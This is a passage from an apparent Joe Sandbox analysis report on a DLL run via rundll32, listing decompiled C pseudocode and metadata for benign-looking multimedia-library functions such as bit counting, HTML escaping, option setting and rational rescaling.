                                                      														__eax = L100089C0();
                                                      														__ecx = __esp[4];
                                                      													}
                                                      													if(__ebx > 0x3ff) {
                                                      														goto L38;
                                                      													}
                                                      													L36:
                                                      													__esp[2] = __ebx;
                                                      													__eax = "AMBI%d";
                                                      													__esp[1] = "AMBI%d";
                                                      													__eax = __esp[6];
                                                      													 *__esp = __esp[6];
                                                      													__eax = L100089C0();
                                                      													continue;
                                                      												}
                                                      												if(__eax == 3) {
                                                      													__eax =  *(__edi + 8);
                                                      													__edx =  *(__edi + 0xc);
                                                      													__esp[4] = __eax;
                                                      													__ebx = __eax;
                                                      													__ecx = __eax;
                                                      													__esp[5] =  *(__edi + 0xc);
                                                      													__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
                                                      													__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
                                                      													__ebx = __ecx;
                                                      													__ecx = __ecx >> 2;
                                                      													__ebx = __ebx & 0x33333333;
                                                      													__ecx = __ecx & 0x33333333;
                                                      													__ecx =  &(__ecx[__ebx]);
                                                      													__ecx = __ecx >> 4;
                                                      													__ecx =  &(__ecx[__ecx >> 4]);
                                                      													__ecx = __ecx & 0x0f0f0f0f;
                                                      													__ebx =  &(__ecx[__ecx >> 8]);
                                                      													__ecx = __esp[5];
                                                      													__eax = __ebx;
                                                      													__ecx = __ecx >> 1;
                                                      													__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
                                                      													__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
                                                      													__eax = __eax >> 0x10;
                                                      													__edx = __ecx;
                                                      													__ecx = __ecx >> 2;
                                                      													__edx = __edx & 0x33333333;
                                                      													__ecx = __ecx & 0x33333333;
                                                      													__ebx = (__eax >> 0x10) + __eax;
                                                      													__ecx =  &(__ecx[__edx]);
                                                      													__eax = (__eax >> 0x10) + __eax;
                                                      													__edx = __ecx;
                                                      													__eax = __eax & 0x0000003f;
                                                      													__edx = __ecx >> 4;
                                                      													__ecx =  &(__ecx[__ecx >> 4]);
                                                      													__ecx = __ecx & 0x0f0f0f0f;
                                                      													__ecx = __ecx >> 8;
                                                      													__ecx =  &(__ecx[__ecx >> 8]);
                                                      													__ecx = __ecx >> 0x10;
                                                      													__ebx =  &(__ecx[__ecx >> 0x10]);
                                                      													__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
                                                      													__ecx = __eax + ( &(__ecx[__ecx >> 0x10]) & 0x0000003f);
                                                      													__ebx = __ebp;
                                                      													__esi = __esi - __ecx;
                                                      													__ebx = __ebp - __esi;
                                                      													if(__ebp >= __esi) {
                                                      														__esp[7] = __ebp;
                                                      														__eax = __esp[4];
                                                      														__ecx = 0;
                                                      														__edx = __esp[5];
                                                      														__ebp = __edi;
                                                      														goto L20;
                                                      													}
                                                      													__ebx = 0;
                                                      													if(__ebp == 0) {
                                                      														goto L36;
                                                      													}
                                                      													__eax = 0x100aeacf;
                                                      													__ebx = __ebp;
                                                      													__esp[1] = 0x100aeacf;
                                                      													__eax = __esp[6];
                                                      													_t46 = __ebp + 0x400; // 0x401
                                                      													__ecx = _t46;
                                                      													__esp[4] = _t46;
                                                      													 *__esp = __esp[6];
                                                      													__eax = L100089C0();
                                                      													__ecx = __esp[4];
                                                      													if(__ebp <= 0x3ff) {
                                                      														goto L36;
                                                      													}
                                                      													goto L32;
                                                      												}
                                                      												if(__eax == 0) {
                                                      													goto L16;
                                                      												}
                                                      												if(__ebp != 0) {
                                                      													goto L42;
                                                      												}
                                                      												goto L9;
                                                      											}
                                                      											__edx =  *(__edi + 8);
                                                      											__eax = __ebp + __ebp * 2;
                                                      											__ecx = __edx + __eax * 8;
                                                      											if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
                                                      												goto L3;
                                                      											}
                                                      											__eax = __esp[6];
                                                      											__ecx =  &(__ecx[4]);
                                                      											__ebp = __ebp + 1;
                                                      											__esp[2] = __ecx;
                                                      											__ecx = "@%s";
                                                      											__esp[1] = "@%s";
                                                      											 *__esp = __esp[6];
                                                      											__eax = L100089C0();
                                                      											__esi =  *(__edi + 4);
                                                      											if(__esi > __ebp) {
                                                      												goto L4;
                                                      											}
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      									__esp[2] = __eax;
                                                      									__eax = "%s";
                                                      									__esp[1] = "%s";
                                                      									__eax = __esp[6];
                                                      									 *__esp = __esp[6];
                                                      									__eax = L100089C0();
                                                      									goto L10;
                                                      								}
                                                      								if(__ecx != 0xffffffff) {
                                                      									goto L32;
                                                      								}
                                                      								goto L9;
                                                      							}
                                                      							if(__ecx > 0x28) {
                                                      								goto L32;
                                                      							}
                                                      							goto L26;
                                                      							L19:
                                                      							__ecx =  &(__ecx[1]);
                                                      						} while (__ecx != 0x40);
                                                      						__edi = __ebp;
                                                      						__ebp = __esp[7];
                                                      						if(__ebp == 0) {
                                                      							goto L9;
                                                      						}
                                                      						goto L42;
                                                      					}
                                                      				}
                                                      			}




                                                      0x1000d7e8
                                                      0x1000d7eb
                                                      0x1000d7f6
                                                      0x1000d7fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d7fa
                                                      0x1000d5f9
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d601
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d601
                                                      0x1000d625
                                                      0x1000d628
                                                      0x1000d631
                                                      0x1000d634
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d636
                                                      0x1000d63a
                                                      0x1000d63d
                                                      0x1000d63e
                                                      0x1000d642
                                                      0x1000d647
                                                      0x1000d64b
                                                      0x1000d64e
                                                      0x1000d653
                                                      0x1000d658
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d658
                                                      0x1000d620
                                                      0x1000d701
                                                      0x1000d705
                                                      0x1000d70a
                                                      0x1000d70e
                                                      0x1000d712
                                                      0x1000d715
                                                      0x00000000
                                                      0x1000d715
                                                      0x1000d8a2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d8a8
                                                      0x1000d6ec
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d6b2
                                                      0x1000d6b2
                                                      0x1000d6b3
                                                      0x1000d8b0
                                                      0x1000d8b2
                                                      0x1000d8b8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d8b8
                                                      0x1000d698

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprintf
                                                      • String ID: @%s
                                                      • API String ID: 3083893021-2921637043
                                                      • Opcode ID: 3226884ed7a48c89542cb2da4cd6bdc3bde8d4d284e963f694dc1568948eeeaa
                                                      • Instruction ID: 3992f4aefadd0f47064a5f8236616475ea9e2f99c0eaa1b511875076a351044c
                                                      • Opcode Fuzzy Hash: 3226884ed7a48c89542cb2da4cd6bdc3bde8d4d284e963f694dc1568948eeeaa
                                                      • Instruction Fuzzy Hash: F32128719087168BE350EF59C48022EF7E1FB98394F12892EE89897315E731ED55CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_expr_parse_and_eval.MAIN ref: 1002E659
                                                        • Part of subcall function 100177F0: mv_expr_parse.MAIN ref: 10017862
                                                        • Part of subcall function 100177F0: mv_expr_free.MAIN ref: 100178D7
                                                        • Part of subcall function 100177F0: mv_expr_free.MAIN ref: 100178E6
                                                        • Part of subcall function 100177F0: mv_expr_free.MAIN ref: 100178F5
                                                        • Part of subcall function 100177F0: mv_freep.MAIN ref: 10017904
                                                        • Part of subcall function 100177F0: mv_freep.MAIN ref: 1001790C
                                                        • Part of subcall function 100177F0: mv_expr_free.MAIN ref: 10017926
                                                        • Part of subcall function 100177F0: mv_expr_free.MAIN ref: 10017935
                                                        • Part of subcall function 100177F0: mv_expr_free.MAIN ref: 10017944
                                                        • Part of subcall function 100177F0: mv_freep.MAIN ref: 10017953
                                                        • Part of subcall function 100177F0: mv_freep.MAIN ref: 1001795B
                                                      • mv_d2q.MAIN ref: 1002E675
                                                      • mv_reduce.MAIN ref: 1002E6C9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_expr_free$mv_freep$mv_d2qmv_expr_parsemv_expr_parse_and_evalmv_reduce
                                                      • String ID: %d:%d%c
                                                      • API String ID: 3833080124-2624059611
                                                      • Opcode ID: c0dab5111b246b7793677cbea3694c592915a4b51e12e4901537c35080ba4451
                                                      • Instruction ID: 32cee4adaa6e940534327489766bd4286550dcd166c12c6ab9e9ab54eb2fc32a
                                                      • Opcode Fuzzy Hash: c0dab5111b246b7793677cbea3694c592915a4b51e12e4901537c35080ba4451
                                                      • Instruction Fuzzy Hash: 143157B59193419FC740DF29C58010AFBE1BF89784F458D2EF989DB311E7B0E9448B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_log$strcmp
                                                      • String ID: %-15s
                                                      • API String ID: 1163046698-755444208
                                                      • Opcode ID: 95967de6711d041c351af1bc06a49e10b9f53db266bf100d43d0bd2239a687f0
                                                      • Instruction ID: ce635d268765be07717733ae1f701fccf88d57a4aae717667b6e3b1a655ee8de
                                                      • Opcode Fuzzy Hash: 95967de6711d041c351af1bc06a49e10b9f53db266bf100d43d0bd2239a687f0
                                                      • Instruction Fuzzy Hash: 8B21B278A093459FCB50DF28E09069EB7E1EF88B80F92C82DE89997351D374E940DB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: ntsc
                                                      • API String ID: 1004003707-2045543799
                                                      • Opcode ID: 45332122925daee58b0ca36453adb93a54a139fa692ca5e16f6db20bb7fad8e3
                                                      • Instruction ID: a92f6e95659317827b4528b13064fbf16e1d4fcf51acc17d8aa5f4157741274d
                                                      • Opcode Fuzzy Hash: 45332122925daee58b0ca36453adb93a54a139fa692ca5e16f6db20bb7fad8e3
                                                      • Instruction Fuzzy Hash: A5111CB4A483829FE300DF69E4C065ABBE5EF85340F95896AF49897361D370EC81DB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _errno$mv_small_strptime
                                                      • String ID: %M:%S
                                                      • API String ID: 1751681387-2500880230
                                                      • Opcode ID: f2beb3df4ee0f6f61ca7a34fa68ce2ceebecdb36893305a6cf37f0a46d557ff3
                                                      • Instruction ID: 08dd91ef31b92b14981fe1afeff638f908fd3777591abbf69ec9e5e015226bf1
                                                      • Opcode Fuzzy Hash: f2beb3df4ee0f6f61ca7a34fa68ce2ceebecdb36893305a6cf37f0a46d557ff3
                                                      • Instruction Fuzzy Hash: 10010C75A05305DFD764DF29D45076EBBE0FB84280F51883EE899C3250EA3098458F92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E1002D72B(intOrPtr* __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr* __ebp, void* __fp0, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, char* _a40, intOrPtr _a44, char _a60) {
                                                      				intOrPtr* _t27;
                                                      				intOrPtr _t32;
                                                      				char* _t36;
                                                      				intOrPtr* _t40;
                                                      				intOrPtr _t49;
                                                      				intOrPtr _t52;
                                                      				intOrPtr* _t55;
                                                      				intOrPtr* _t58;
                                                      				void* _t64;
                                                      
                                                      				_t64 = __fp0;
                                                      				_t55 = __ebp;
                                                      				_t52 = __esi;
                                                      				_t49 = __edi;
                                                      				_t40 = __ebx;
                                                      				while(1) {
                                                      					L6:
                                                      					_a12 = 0;
                                                      					_a8 = _a4;
                                                      					_a4 =  *_t55;
                                                      					_t36 =  &_a60;
                                                      					 *_t58 = _t36;
                                                      					_a40 = _t36;
                                                      					_t32 = E10011210(_t40, _t49, _t52, _t55);
                                                      					if(_t32 >= 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						break;
                                                      					}
                                                      					while(1) {
                                                      						L1:
                                                      						_a8 = _t55;
                                                      						_a12 = 2;
                                                      						_a4 = 0x100b3f1d;
                                                      						 *_t58 =  *_t40;
                                                      						_t27 = E100110D0();
                                                      						_t55 = _t27;
                                                      						if(_t27 == 0) {
                                                      							break;
                                                      						}
                                                      						_a12 = _t49;
                                                      						_a8 = _a4;
                                                      						 *_t58 = _t52;
                                                      						_a4 =  *_t55;
                                                      						_t32 = L1002CB80(_t40, _t49, _t52, _t55, _t64);
                                                      						if(_t32 == 0xabafb008) {
                                                      							goto L6;
                                                      						} else {
                                                      							if(_t32 >= 0) {
                                                      								continue;
                                                      							} else {
                                                      								_a40 =  &_a60;
                                                      								L5:
                                                      								_a44 = _t32;
                                                      								_a16 = _a4;
                                                      								_a8 = "Error setting option %s to value %s.\n";
                                                      								_a4 = 0x10;
                                                      								 *_t58 = _t52;
                                                      								_a12 =  *_t55;
                                                      								L10023A40();
                                                      								 *_t58 = _a40;
                                                      								L10011CC0();
                                                      								return _a44;
                                                      							}
                                                      						}
                                                      						L10:
                                                      					}
                                                      					 *_t58 = _t40;
                                                      					L10011CC0();
                                                      					 *_t40 = _a60;
                                                      					return 0;
                                                      					goto L10;
                                                      				}
                                                      				goto L5;
                                                      			}












                                                      APIs
                                                      Strings
                                                      • Error setting option %s to value %s., xrefs: 1002D6F7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_dict_freemv_dict_getmv_dict_setmv_logmv_opt_set
                                                      • String ID: Error setting option %s to value %s.
                                                      • API String ID: 1354616078-3279051434
                                                      • Opcode ID: be12c7fe19db5ab61db51b4a1bede206e01a94ada12606f0a4e7e7a9321a0867
                                                      • Instruction ID: 6b9ea6aabfc4124447e1f2434b6fc2a42ecd06c72756f075168a49251e9f20a7
                                                      • Opcode Fuzzy Hash: be12c7fe19db5ab61db51b4a1bede206e01a94ada12606f0a4e7e7a9321a0867
                                                      • Instruction Fuzzy Hash: B6017AB9A08304AFC744DF28D48059ABBE0FB88354F10892EF99CD7310E634EA409F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E10009784(signed int __eax, void* __ebx, intOrPtr __esi, intOrPtr _a4, char* _a8) {
                                                      				signed int _t10;
                                                      				void* _t21;
                                                      				intOrPtr _t28;
                                                      				intOrPtr* _t32;
                                                      				void* _t37;
                                                      
                                                      				_t28 = __esi;
                                                      				_t21 = __ebx;
                                                      				_t10 = __eax;
                                                      				L1:
                                                      				while(1) {
                                                      					L1:
                                                      					if(_t10 == 0x22) {
                                                      						 *_t32 = _t28;
                                                      						_a8 = "&quot;";
                                                      						_a4 = 0x100ac500;
                                                      						L100089C0();
                                                      					} else {
                                                      						if(_t10 != 0x26) {
                                                      							L10:
                                                      							E100086F0(_t28, _t10);
                                                      						} else {
                                                      							 *_t32 = _t28;
                                                      							_a8 = 0x100ac508;
                                                      							_a4 = 0x100ac500;
                                                      							L100089C0();
                                                      							while(1) {
                                                      								L4:
                                                      								_t10 =  *(_t21 + 1) & 0x000000ff;
                                                      								_t21 = _t21 + 1;
                                                      								if(_t10 == 0) {
                                                      									break;
                                                      								}
                                                      								_t37 = _t10 - 0x3c;
                                                      								if(_t37 == 0) {
                                                      									 *_t32 = _t28;
                                                      									_a8 = 0x100ac50e;
                                                      									_a4 = 0x100ac500;
                                                      									L100089C0();
                                                      									continue;
                                                      								} else {
                                                      									if(_t37 <= 0) {
                                                      										goto L1;
                                                      									} else {
                                                      										if(_t10 != 0x3e) {
                                                      											goto L10;
                                                      										} else {
                                                      											 *_t32 = _t28;
                                                      											_a8 = 0x100ac513;
                                                      											_a4 = 0x100ac500;
                                                      											L100089C0();
                                                      											continue;
                                                      										}
                                                      									}
                                                      								}
                                                      								L13:
                                                      							}
                                                      							return _t10;
                                                      							goto L13;
                                                      						}
                                                      					}
                                                      					goto L4;
                                                      				}
                                                      			}


                                                      APIs
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C65
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprintf
                                                      • String ID: &amp;$&gt;
                                                      • API String ID: 3083893021-624094588
                                                      • Opcode ID: 3a0184e92dcb7e1e473096fa467e9c05a6d80c2d3150c9be7b04146b26d57726
                                                      • Instruction ID: 4c5438aa6a129c9ce896481cefdf623b6b0dbe5659d14e32da422b5388819884
                                                      • Opcode Fuzzy Hash: 3a0184e92dcb7e1e473096fa467e9c05a6d80c2d3150c9be7b04146b26d57726
                                                      • Instruction Fuzzy Hash: 0EF03071C08B59CADB50EF68855079AB7E5EB853D0F86480EE4DA9B209C734FC86C782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_log
                                                      • String ID: Key '%s' not found.
                                                      • API String ID: 2418673259-2052305073
                                                      • Opcode ID: b6e5dbdcddb3e8e537d9606f4ee5ef41b23fddcb67c58fcbb9e80a7253b86ab3
                                                      • Instruction ID: 2935cc58392a1398e58e060f8426a77ac91e2dc20dd80442988a03116b7c0377
                                                      • Opcode Fuzzy Hash: b6e5dbdcddb3e8e537d9606f4ee5ef41b23fddcb67c58fcbb9e80a7253b86ab3
                                                      • Instruction Fuzzy Hash: CBE075755087509FC304DF28E48111EFBE0EF88354F41C82EE5CD97315DA75E4418B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_mul_q.MAIN ref: 10025352
                                                        • Part of subcall function 10032DA0: mv_reduce.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,10025357), ref: 10032DE1
                                                      • mv_rescale_rnd.MAIN ref: 100253F3
                                                      • mv_rescale_rnd.MAIN ref: 10025420
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_rescale_rnd$mv_mul_qmv_reduce
                                                      • String ID:
                                                      • API String ID: 3269292098-0
                                                      • Opcode ID: f624b8d92a1708bc234eb41fcbaf1f65781f80c408bdb3c29c89a492a19e0c72
                                                      • Instruction ID: 32a7e665d33738f0cd05e796bf5e7e595d24b251b1839c0e3c978cd3fb488921
                                                      • Opcode Fuzzy Hash: f624b8d92a1708bc234eb41fcbaf1f65781f80c408bdb3c29c89a492a19e0c72
                                                      • Instruction Fuzzy Hash: F171AF74A097409FC344CF29D48061AFBE1BFC8764F548A2EF8A993360D771E9418F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E1003A320(void* __edx, signed char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t51;
                                                      				signed int _t53;
                                                      				signed int _t57;
                                                      				int _t60;
                                                      				signed int _t63;
                                                      				signed int _t64;
                                                      				signed int _t73;
                                                      				signed char* _t74;
                                                      				signed int _t75;
                                                      				signed int _t76;
                                                      				signed char _t78;
                                                      				unsigned int _t79;
                                                      				signed int _t80;
                                                      				void* _t82;
                                                      				signed int _t84;
                                                      				signed int _t85;
                                                      				signed int _t86;
                                                      				void* _t87;
                                                      				signed int _t88;
                                                      				signed int _t91;
                                                      				void* _t92;
                                                      				signed int _t93;
                                                      				signed int _t94;
                                                      				signed int _t95;
                                                      				signed char* _t96;
                                                      				void* _t97;
                                                      				signed int* _t98;
                                                      
                                                      				_t98 = _t97 - 0x3c;
                                                      				_t91 = _a12;
                                                      				_t93 = _a16;
                                                      				 *_t98 = 0;
                                                      				_t73 = _a20;
                                                      				_v72 = _t91;
